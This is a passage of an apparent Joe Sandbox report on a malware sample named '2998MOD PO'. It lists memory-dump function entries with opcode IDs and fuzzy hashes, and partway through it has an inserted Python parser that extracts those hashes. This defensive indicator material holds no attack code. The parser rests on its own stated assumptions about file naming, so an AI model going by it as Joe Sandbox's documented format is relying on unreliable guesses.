                          • String ID:
                          • API String ID:
                          • Opcode ID: d6ba84c99c408ccb58053f73da0e3083f1668bdcbb9208741e9ffe29eb991e16
                          • Instruction ID: 194494ddefcc3f6354c28a1773995eb635055a3b9dabc270c6ed35a3eacd564a
                          • Opcode Fuzzy Hash: d6ba84c99c408ccb58053f73da0e3083f1668bdcbb9208741e9ffe29eb991e16
                          • Instruction Fuzzy Hash: 1551E275900216DFDB22DFA9D880AAEBBB9FF48324B554659D509A3348E730EE05CFD0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                          • Instruction ID: fedc026db51f92ea07366751ce533fa5083a0ea0dc8ff30f3fbf4260aad8f8a8
                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                          • Instruction Fuzzy Hash: 9A411971645706AFDB25CF68C984A6AB7A9FFC0214F08863EE9178B241EB30ED15C7D0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b35c503a3bf3c9b33109b5ac1d5654acf13541ca0939251a0858c1f22444f1f
                          • Instruction ID: b5efc127a0a47e6ae304a734cf35ac06b84fc2079d635faabf5d222a88f6be47
                          • Opcode Fuzzy Hash: 5b35c503a3bf3c9b33109b5ac1d5654acf13541ca0939251a0858c1f22444f1f
                          • Instruction Fuzzy Hash: 8741CA35D01219DBDB14DF98C580AEEBBB9BF88610F18816AF90DE7240E7349D45CBA4
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0152637347886c7a9da66984f79dd42d2706ab96aff24df8206ad4a72ecdf8a
                          • Instruction ID: 37e77e49825f784eb35aef1a94d1ea97a7e064812bfa9cd267ebf53bf8c76bb0
                          • Opcode Fuzzy Hash: a0152637347886c7a9da66984f79dd42d2706ab96aff24df8206ad4a72ecdf8a
                          • Instruction Fuzzy Hash: 3D41B2716047029FDB25DF28C884A1BBBF9FF88324F44492AE55FC7611EB35E8488B91
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                          • Instruction ID: 086884b9b3d7f4e9ffe7c8f37cfabb768f4471471f76e5ec4baf01c77ee2dc09
                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                          • Instruction Fuzzy Hash: AC515C75A00219DFCB15CF58C580AADF7B6FF84720F2481A9DA19A7351D770AE41CB90
                          • Instruction Fuzzy Hash: DC318B31600645EFEB21CFA8C984F6AB7F9FF85354F1049A9E55A8B290E730EE01CB51
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb61fca8987aa153ccf91551202c55bbe94d8e94532be5c44f541f787916d019
                          • Instruction ID: ee5b7528084d2a2be308c62dad5c1ea0d350e9e112f713b5ba7b5ad95c254172
                          • Opcode Fuzzy Hash: eb61fca8987aa153ccf91551202c55bbe94d8e94532be5c44f541f787916d019
                          • Instruction Fuzzy Hash: 59317E7960020AAFDB15CF1CC8849AE77B5FF84304B16445DF94D9B3A1E731EA50CB95
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c70f74936df6901b036d40260408b05ba8d07f9ec7739b2a78fa9b3c2b27b3a9
                          • Instruction ID: 399e71361ceaf47e1a3f7025b854cc40876177a13dd049b35f359909ff49f685
                          • Opcode Fuzzy Hash: c70f74936df6901b036d40260408b05ba8d07f9ec7739b2a78fa9b3c2b27b3a9
                          • Instruction Fuzzy Hash: 4821A075900529ABCF11DF59C881ABEB7F8FF48740B400069F945EB250D738AD42CBA1
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84b6a29b29121b056aa5b5841f8d66ad3356b8dabea82a888c9983ef640b5c24
                          • Instruction ID: 211057aa0ece5fef00c51966db344324aec5c04d5d7e4d71c87081440fa263ef
                          • Opcode Fuzzy Hash: 84b6a29b29121b056aa5b5841f8d66ad3356b8dabea82a888c9983ef640b5c24
                          • Instruction Fuzzy Hash: 1A218B71A00645ABDB16DF6DD980F6AB7A8FF88780F140069F948D76A1D634EE40CBA4
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 845e25052a0791913b2a8744d9ef97e9679511a968e9ac0e4725ed774eb27eba
                          • Instruction ID: 440747d035920ffce1d6412701132b83c6e7282caf25b31e318981af849d643e
                          • Opcode Fuzzy Hash: 845e25052a0791913b2a8744d9ef97e9679511a968e9ac0e4725ed774eb27eba
                          • Instruction Fuzzy Hash: C221A4719043459BD712DF6DDA44B5BBBDCAF95380F084456BD84C7291D734D608C6A2
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f90e20f00e99ddeaeccb4bad8ec28155be52addd8de24caad34aecb1755fe001
                          • Instruction ID: d6e4b2ee44e5b590d00119bf68f4539a9816d4eb592d01446ae546b799dad29f
                          • Opcode Fuzzy Hash: f90e20f00e99ddeaeccb4bad8ec28155be52addd8de24caad34aecb1755fe001
                          • Instruction Fuzzy Hash: 7F2108316056819BE723977CCD18F247BD8AF41775F2903A0FA289B6E2DB69D8418281
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2389149a6fe23ed68dd22c025419c44908533ee74bfb9590cad69c7af1849e1
                          • Instruction ID: 090fb6231d73e1ee150f9c9e2b9409ab6a8437a9db95e514d0e0ba95596dbc38
                          • Opcode Fuzzy Hash: f2389149a6fe23ed68dd22c025419c44908533ee74bfb9590cad69c7af1849e1
                          • Instruction Fuzzy Hash: 81219579201B41AFCB29DF29CD40B46B7F9BF48B04F24846CA50DCBB61E231E942CB94
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07b65aed73090cee630f00caa27bfb4eee1f763b908dbe4eba0cdb386d7c1ccc
                          • Instruction ID: d8c3d1673d9533f49b97c2f43344236b7059594bbeecec48ab27dabcf74ed90f
                          • Opcode Fuzzy Hash: 07b65aed73090cee630f00caa27bfb4eee1f763b908dbe4eba0cdb386d7c1ccc
                          • Instruction Fuzzy Hash: 4511E972380B21BFE72256699C41F277699DBD4B60F150028B798DB2D0EB70DC018795
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 081ad5adc02261d7082688afe7b5c980135011646bc25697c315418171775fc4
                          • Instruction ID: 053c918022b415aaa983b47d258e98c25b9fdb7ef7ec6f78bc2f63095a612de7
                          • Opcode Fuzzy Hash: 081ad5adc02261d7082688afe7b5c980135011646bc25697c315418171775fc4
                          • Instruction Fuzzy Hash: FF21CBB1E01209ABDB24DFAAD985AAEFBF8FF98750F10012EE509A7250D6709941CB54
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                          • Instruction ID: 8b25c3f80e7e6cc51b02fa6833292d5ffae7ef73cbd6ea86b28efee80dea75e3
                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                          • Instruction Fuzzy Hash: 3B218C72A00209EFDF129F98CC40BAEBBB9EF88320F204419F904A7251D738DD50CB50
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                          • Instruction ID: 592895d3f5b3ca242d6eaccb5498c9e8603648a0bbdc1e1bcf836cafcd6222e9
                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                          • Instruction Fuzzy Hash: DC11DD72600609AFEB269B88CDC0F9BBBBCEB80B54F140029F6099F190D671ED44CB60
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c4f4ebba2d0ccaa3dbaf4a45a136c123d3c85db9393234ce969b73e074e675e
                          • Instruction ID: 8de9afcc7071e2d8cde55a96818944eef3e27da33165601dc73dd739ec8a5735
                          • Opcode Fuzzy Hash: 1c4f4ebba2d0ccaa3dbaf4a45a136c123d3c85db9393234ce969b73e074e675e
                          • Instruction Fuzzy Hash: 7311B6317006119BEB11EF4DC4C0A16BBF9AF46B11B95406DED0CDF205D6B1D90187A0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                          • Instruction ID: f5740376fa2780bf215f50b9f2abbd4363f85ad67e21c569783263df9dd8528d
                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                          • Instruction Fuzzy Hash: F0217C72600651DFDB218F49C690EA6FBEAEB94B11F15883EE55D87610C730ED01CB80
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f97326a538a725f5b11c5ac6f02f060a57cd40b461cb30a473120d6910812de
                          • Instruction ID: 52b11fd7bfe5d0bf68d73f9a2c43c7af86d70df909080d4caa31a19441a87d76
                          • Opcode Fuzzy Hash: 4f97326a538a725f5b11c5ac6f02f060a57cd40b461cb30a473120d6910812de
                          • Instruction Fuzzy Hash: 0F216F75A00205DFCB14DF98C581A6EBBB9FB89314F64456DD109A7311DB71AE06CBE0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73351bebe4a757055e573fc56bfdf585adce22d4cc16eceb27a0fbf5b3d906b5
                          • Instruction ID: c79646c41a7b9a2f75cf4af04a38e79a3505e8bf750d236a472815ac6483e6e5
                          • Opcode Fuzzy Hash: 73351bebe4a757055e573fc56bfdf585adce22d4cc16eceb27a0fbf5b3d906b5
                          • Instruction Fuzzy Hash: 97115C719482499FDB01CFA8C5416EEBFB0FB8A214F0841A6D889E72C2E6359522CBC1
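The block above is the one dump in this listing that the report annotates with "Yara matches" (the image at 0x00400000 in process 4, as opposed to the region at 0x01950000 that the surrounding entries come from). As an added example that is not part of the Joe Sandbox report, the following parser turns these per-function entries into records, groups them by the memory dump they were lifted from, and collects the Instruction Fuzzy Hash values of the functions that came from a Yara-flagged dump. The two sample entries are copied from this listing; the field layout assumed for the `.sdmp` file name (pid, dump number, id, base address, all hex-encoded) and the cross-check against the `hcaresult_<pid>_<dump>_<base>_` snapshot name are assumptions of the example, not something the report documents.

```python
"""Parse Joe Sandbox per-function similarity blocks into records, group them by
source memory dump, and collect fuzzy hashes from dumps flagged by Yara."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed input: two entries copied from this report's listing, one from the
# 0x01950000 dump and one from the 0x00400000 dump that carries "Yara matches".
SAMPLE = """\
Memory Dump Source
• Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f97326a538a725f5b11c5ac6f02f060a57cd40b461cb30a473120d6910812de
• Instruction ID: 52b11fd7bfe5d0bf68d73f9a2c43c7af86d70df909080d4caa31a19441a87d76
• Opcode Fuzzy Hash: 4f97326a538a725f5b11c5ac6f02f060a57cd40b461cb30a473120d6910812de
• Instruction Fuzzy Hash: 0F216F75A00205DFCB14DF98C581A6EBBB9FB89314F64456DD109A7311DB71AE06CBE0
Memory Dump Source
• Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 73351bebe4a757055e573fc56bfdf585adce22d4cc16eceb27a0fbf5b3d906b5
• Instruction ID: c79646c41a7b9a2f75cf4af04a38e79a3505e8bf750d236a472815ac6483e6e5
• Opcode Fuzzy Hash: 73351bebe4a757055e573fc56bfdf585adce22d4cc16eceb27a0fbf5b3d906b5
• Instruction Fuzzy Hash: 97115C719482499FDB01CFA8C5416EEBFB0FB8A214F0841A6D889E72C2E6359522CBC1
"""

# Value of the "Source File" field: "<name>.sdmp, Offset: <hex>, based on PE: true|false"
SOURCE_RE = re.compile(r"(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)")
# "• Key: value" lines (bullet optional, value may be empty, e.g. "API ID:")
FIELD_RE = re.compile(r"^\s*•?\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")


@dataclass(frozen=True)
class FunctionEntry:
    pid: int              # process id from the .sdmp name (assumed hex-encoded)
    base: int             # dump base address (equals the "Offset" field)
    based_on_pe: bool
    yara_matches: bool    # the block carried a "Yara matches" line
    opcode_id: str
    instruction_id: str
    opcode_fuzzy: str
    instruction_fuzzy: str


def parse_entries(text: str) -> list[FunctionEntry]:
    entries = []
    # Every block begins with "Memory Dump Source"; piece [0] is whatever precedes the first one.
    for chunk in re.split(r"^\s*Memory Dump Source\s*$", text, flags=re.M)[1:]:
        kv, flags = {}, set()
        for line in chunk.splitlines():
            m = FIELD_RE.match(line)
            if m:
                kv[m["key"]] = m["val"]
            elif line.strip():
                flags.add(line.strip())          # bare lines such as "Yara matches"
        src = SOURCE_RE.match(kv.get("Source File", ""))
        if not src:
            raise ValueError(f"unparsable Source File: {kv.get('Source File')!r}")
        # Assumed .sdmp name layout: <pid>.<dump#>.<id>.<base>.<...>.sdmp, fields hex-encoded.
        parts = src["name"][:-len(".sdmp")].split(".")
        pid, dump_no, base = int(parts[0], 16), int(parts[1], 16), int(parts[3], 16)
        if base != int(src["off"], 16):
            raise ValueError("base in .sdmp name disagrees with Offset field")
        # The snapshot name repeats pid/dump#/base; refuse entries whose two sources disagree.
        expect = f"hcaresult_{pid}_{dump_no}_{base:x}_"
        if not kv.get("Snapshot File", "").startswith(expect):
            raise ValueError(f"snapshot {kv.get('Snapshot File')!r} does not start with {expect!r}")
        entries.append(FunctionEntry(
            pid=pid, base=base, based_on_pe=src["pe"] == "true",
            yara_matches="Yara matches" in flags,
            opcode_id=kv["Opcode ID"], instruction_id=kv["Instruction ID"],
            opcode_fuzzy=kv["Opcode Fuzzy Hash"], instruction_fuzzy=kv["Instruction Fuzzy Hash"]))
    return entries


def group_by_dump(entries: list[FunctionEntry]) -> dict[tuple[int, int], list[FunctionEntry]]:
    """Map (pid, base) to the functions lifted from that dump."""
    groups = defaultdict(list)
    for e in entries:
        groups[(e.pid, e.base)].append(e)
    return dict(groups)


def yara_flagged_hashes(entries: list[FunctionEntry]) -> set[str]:
    """Instruction fuzzy hashes of functions from Yara-flagged dumps: the set worth carrying into similarity hunting."""
    return {e.instruction_fuzzy for e in entries if e.yara_matches}
```

Each block states the dump base address three times (in the `.sdmp` file name, in `Offset`, and in the snapshot name), so the parser refuses any entry where those disagree rather than silently feeding a mis-copied hash into a hunting set. The fuzzy-hash format is Joe Sandbox's own, so the example carries the hashes as opaque strings and does not attempt to compare them.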
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 722f74771283fa1df86aa63be0ac1756ba69edcddc212aa9e8a932bc00086ba6
                          • Instruction ID: bfc06b9d8e98a0691dab24dba69ca21675bd20aa74fe8d0e3a8411f001c9beb4
                          • Opcode Fuzzy Hash: 722f74771283fa1df86aa63be0ac1756ba69edcddc212aa9e8a932bc00086ba6
                          • Instruction Fuzzy Hash: 01215C75610B01EFD7218F69C9C1FA6B7E8FF84650F44882DE5AEC7250EA70B950CB61
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 45eb58539325d4d5329e833c28328714b12425f0428619f16002d80ff9de046d
                          • Instruction ID: 5cd41c31482cc0512d2e87764f9e14b8b5bf487b5a36df3c9d9dc42a16a2a59b
                          • Opcode Fuzzy Hash: 45eb58539325d4d5329e833c28328714b12425f0428619f16002d80ff9de046d
                          • Instruction Fuzzy Hash: AB110C337041145BCF1ADB29CC85A6B739AEBD5370B654529D92FCB251EA309D05C290
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 363a12c5a616ce38f4760b565589ce9f549352f46c948dc806b0022e9c2c6e73
                          • Instruction ID: ef0ef5dc7aded93cc9eb37043f04aa1d46a51a82c264aa59fb3bdca896c60828
                          • Opcode Fuzzy Hash: 363a12c5a616ce38f4760b565589ce9f549352f46c948dc806b0022e9c2c6e73
                          • Instruction Fuzzy Hash: 2611E336240504EFD722DB9DCD40F9A77ADEF95750F014025F609DB265DAB0E901C790
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4a6aa395ce8a70cd3665ef6fbcc185644fc20bdd22925a694d71191a71d97ea
                          • Instruction ID: dd50eeee7baa6805cf91eea79c48290f9dcfdbcc84e7adab2e422788fed601d3
                          • Opcode Fuzzy Hash: b4a6aa395ce8a70cd3665ef6fbcc185644fc20bdd22925a694d71191a71d97ea
                          • Instruction Fuzzy Hash: C1118F76A02745EBCB25CF9DCAC0E9ABBE8AB94651B154079D90D9B311E630EE01CB90
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                          • Instruction ID: c15b99c951d9164083220f8cd7ef5aee4b0e5de2315165ce9a35d32067c948fa
                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                          • Instruction Fuzzy Hash: E6110436A00905EFDB19CB58C801B9EBBB5EFC4210F058269E856D7340E675AE11CB80
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                          • Instruction ID: 7257e28ab95c4402267ed14d537b8e5b66ea84935033957f3f0a122a090c8482
                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                          • Instruction Fuzzy Hash: 702106B5A00B059FD7A0CF29C440B52BBF4FB48B10F10492EE98AC7B50E371E814CB90
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                          • Instruction ID: 4a7bf2828950838ecd9b5e5647c4f53c7a84884c9cc1f2ae60a17c6b38cce501
                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                          • Instruction Fuzzy Hash: 1211C632A00601EFEB239F49D840B56BBE5EF85754F058829E9499B1A0D731DE44E790
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 56da2f905522480ba681c534cd77ec226665985eb95b666fb6842c5e8be68046
                          • Instruction ID: 169a2bf18a5076134dca8dc974bec645135a93b37f14924306d6b51c24fa22d6
                          • Opcode Fuzzy Hash: 56da2f905522480ba681c534cd77ec226665985eb95b666fb6842c5e8be68046
                          • Instruction Fuzzy Hash: AA012231605645ABE327A76EDC98F2B7BCDEF81395F450074F9088B2A1DA24DC00C2B2
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 996119b4d2c0d82f84d04e95a4e78d910b0462459e64ce9080e45a49adfcac05
                          • Instruction ID: 595dbcacd0e577ae0b7ec463f5177f5756f30cfa4a6ea1f2c993f894af169c13
                          • Opcode Fuzzy Hash: 996119b4d2c0d82f84d04e95a4e78d910b0462459e64ce9080e45a49adfcac05
                          • Instruction Fuzzy Hash: 8911CE36201646AFEB25EF59D940F567BA8EF86B65F00452AF90C8B250C370E840CF60
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 87c32eac2b361bd5850a86f326e538251230f3a95934c65ba25a27494231a694
                          • Instruction ID: 7a36394e9ba2cda63e1db00ef016b4cd8aa5e8757d72598dd14fd3445bbd6dd1
                          • Opcode Fuzzy Hash: 87c32eac2b361bd5850a86f326e538251230f3a95934c65ba25a27494231a694
                          • Instruction Fuzzy Hash: 48118276A00615EBEB22EF69CAC0B9EFBB8EF88751F550455DA09A7240D730BE058B50
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 864db0ccb4a29d7e1ec4716de9616a156a85a6263e52962aa183a42d6e2636e7
                          • Instruction ID: 4861b5cd910fd5a026b9051be5f43f1acf5031fdf6b273329885e94820298b9d
                          • Opcode Fuzzy Hash: 864db0ccb4a29d7e1ec4716de9616a156a85a6263e52962aa183a42d6e2636e7
                          • Instruction Fuzzy Hash: 9C019E7590010A9FD725DB19D848F26BBF9FBD5314F60816AE10D8B261D770ED4ACB90
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                          • Instruction ID: 096c611160347fbd1a32773c1dead4a39ae38f4297de10537c0dc572897e424a
                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                          • Instruction Fuzzy Hash: 001108722016C69BEB239B2CD958F253BD8FB41745F1914E2DE8D8B642F328C842C290
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
